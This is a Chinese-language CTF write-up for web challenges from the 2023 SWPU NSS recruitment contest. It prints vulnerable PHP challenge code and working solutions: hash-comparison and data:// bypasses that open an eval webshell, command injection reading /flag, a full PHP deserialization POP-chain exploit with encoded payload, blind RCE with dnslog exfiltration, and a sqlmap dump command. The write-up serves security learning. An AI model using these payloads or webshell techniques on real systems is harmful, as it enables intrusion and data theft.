banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。

2023年SWPU NSS 秋季招新賽 (校外賽道)web題writeup

wallhaven-yx5jkk

水水比賽

賽題可以到https://www.nssctf.cn/index 搜索到

colorful_snake#

右鍵查看 js 源碼,unicode 解碼

image

NSS_HTTP_CHEKER#

cookie editor設置 cookie
X-Forwarded-For: 127.0.0.1
User-Agent設置瀏覽器

一鍵連接!#

  • 弱比較
  • 偽協議
<?php  
highlight_file(__FILE__);  
error_reporting(0);  
$md5_1 = $_GET['md5_1'];  
$md5_2 = $_GET['md5_2'];  
$sha1_1 = $_GET['sha1_1'];  
$sha1_2 = $_GET['sha1_2'];  
$new_player =$_GET['new_player'];  
if ($md5_1 !== $md5_2 && md5($md5_1) === md5($md5_2)) {  
    if ($sha1_1 != $sha1_2 && sha1($sha1_1) === sha1($sha1_2)) {  
        if (file_get_contents($new_player) === "Welcome to NSSCTF!!!") {  
            echo "Congratulations~~~~~~~~~";  
            echo "試試need Antsword<br/>";  
            @eval($_POST['Nss']);  
        }else{  
            echo "可曾聽過data協議?";  
        }  
    } else {  
        echo "sha1又如何相等呢";  
    }  
} else {  
    echo "如何讓md5值相等呢¿";  
}

http://node6.anna.nssctf.cn:28155/?md5_1[]=1&md5_2[]=2&sha1_1[]=1&sha1_2[]=2&new_player=data:text/plain,Welcome to NSSCTF!!!

image

題目提示蟻劍連接,上述地址連接,密碼Nss

image

Pingpingping#

題目描述

<?php  
highlight_file(__FILE__);  
error_reporting(0);  
$_ping = $_GET['Ping_ip.exe'];  
if(isset($_ping)){    system("ping -c 3 ".$_ping);  
}else{    $data = base64_encode(file_get_contents("error.png"));  
    echo "<img src='data:image/png;base64,$data'/>";  
}

image

_替換成[傳參

http://node6.anna.nssctf.cn:28042/?Ping[ip.exe=127.0.0.1;cat+/flag

image

可參考:https://blog.csdn.net/mochu7777777/article/details/115050295

ez_talk#

加個文件頭、webshell 大寫繞過

image

image

UnS3rialize#

題目描述

<?php
highlight_file(__FILE__);
error_reporting(0);
class NSS
{
    public $cmd;
    function __invoke()
    {
        echo "Congratulations!!!You have learned to construct a POP chain<br/>";
        system($this->cmd);
    }
    function __wakeup()
    {
        echo "W4keup!!!<br/>";
        $this->cmd = "echo Welcome to NSSCTF";
    }
}


class C
{
    public $whoami;
    function __get($argv)
    {
        echo "what do you want?";
        $want = $this->whoami;
        return $want();
    }
}

class T
{
    public $sth;
    function __toString()
    {
        echo "Now you know how to use __toString<br/>There is more than one way to trigger";
        return $this->sth->var;
    }
}

class F
{
    public $user = "nss";
    public $passwd = "ctf";
    public $notes;
    function __construct($user, $passwd)
    {
        $this->user = $user;
        $this->passwd = $passwd;
    }
    function __destruct()
    {
        if ($this->user === "SWPU" && $this->passwd === "NSS") {
                echo "Now you know how to use __construct<br/>";
                echo "your notes".$this->notes;
        }else{
            die("N0!");
        }
    }
}



if (isset($_GET['ser'])) {
    $ser = unserialize(base64_decode($_GET['ser']));
} else {
    echo "Let's do some deserialization :)";
}
Let's do some deserialization :)

php 反序列化的題,exp 如下:

<?php
class NSS
{
    public $cmd;
    function __invoke()
    {
        echo "Congratulations!!!You have learned to construct a POP chain<br/>";
        system($this->cmd);
    }
    function __wakeup()
    {
        echo "W4keup!!!<br/>";
        $this->cmd = "echo Welcome to NSSCTF";
    }
}


class C
{
    public $whoami;
    function __get($argv)
    {
        echo "what do you want?";
        $want = $this->whoami;
        return $want();
    }
}

class T
{
    public $sth;
    function __toString()
    {
        echo "Now you know how to use __toString<br/>There is more than one way to trigger";
        return $this->sth->var;
    }
}

class F
{
    public $user = "nss";
    public $passwd = "ctf";
    public $notes;
    function __construct($user, $passwd)
    {
        $this->user = $user;
        $this->passwd = $passwd;
    }
    function __destruct()
    {
        if ($this->user === "SWPU" && $this->passwd === "NSS") {
                echo "Now you know how to use __construct<br/>";
                echo "your notes".$this->notes;
        }else{
            die("N0!");
        }
    }
}
$nss = new NSS();
$nss->cmd = "cat /flag";

$c = new C();
$c->whoami = $nss;

$t = new T();
$t->sth = $c;

$f = new F("SWPU","NSS");
$f->notes = $t;

echo serialize($f);

?>

http://node6.anna.nssctf.cn:28314/?ser=TzoxOiJGIjozOntzOjQ6InVzZXIiO3M6NDoiU1dQVSI7czo2OiJwYXNzd2QiO3M6MzoiTlNTIjtzOjU6Im5vdGVzIjtPOjE6IlQiOjE6e3M6Mzoic3RoIjtPOjE6IkMiOjE6e3M6Njoid2hvYW1pIjtPOjM6Ik5TUyI6Mjp7czozOiJjbWQiO3M6OToiY2F0IC9mbGFnIjt9fX19

RCE plus#

題目描述

<?php  
error_reporting(0);  
highlight_file(__FILE__);  
function strCheck($cmd)  
{  
    if(!preg_match("/\;|\&|\\$|\x09|\x26|more|less|head|sort|tail|sed|cut|awk|strings|od|php|ping|flag/i", $cmd)){  
        return($cmd);  
    }  
    else{  
        die("i hate this");        
      }  
}  
$cmd=$_GET['cmd'];  
strCheck($cmd);  
shell_exec($cmd);  
?>

測試回顯,延遲 5 秒,無回顯 RCE

?cmd=ls / | sleep 5

利用 dnslog 接收 flag

image

image

backup#

下載備份文件 www.zip

源碼如下:

<?php
error_reporting(0);
require_once("flag.php");

class popmart{
    public $yuki;
    public $molly;
    public $dimoo;

    public function __construct(){
        $this->yuki='tell me where';
        $this->molly='dont_tell_you';
        $this->dimoo="you_can_guess";
    }

    public function __wakeup(){
        global $flag;
        global $where_you_go;
        $this->yuki=$where_you_go;

        if($this->molly === $this->yuki){
            echo $flag;
        }
    }
}

$pucky = $_GET['wq'];
if(isset($pucky)){
    if($pucky==="二仙橋"){
        extract($_POST);
        if($pucky==="二仙橋"){    
            die("<script>window.alert('說說看,你要去哪??');</script>");
        }
        unserialize($pucky);
    }
}

變量覆蓋

image

查查 need#

題目描述

image

直接 sqlmap 一把梭

sqlmap -r sql.txt -D school -T students -C name,password,student_id,grade --dump --batch

載入中......
此文章數據所有權由區塊鏈加密技術和智能合約保障僅歸創作者所有。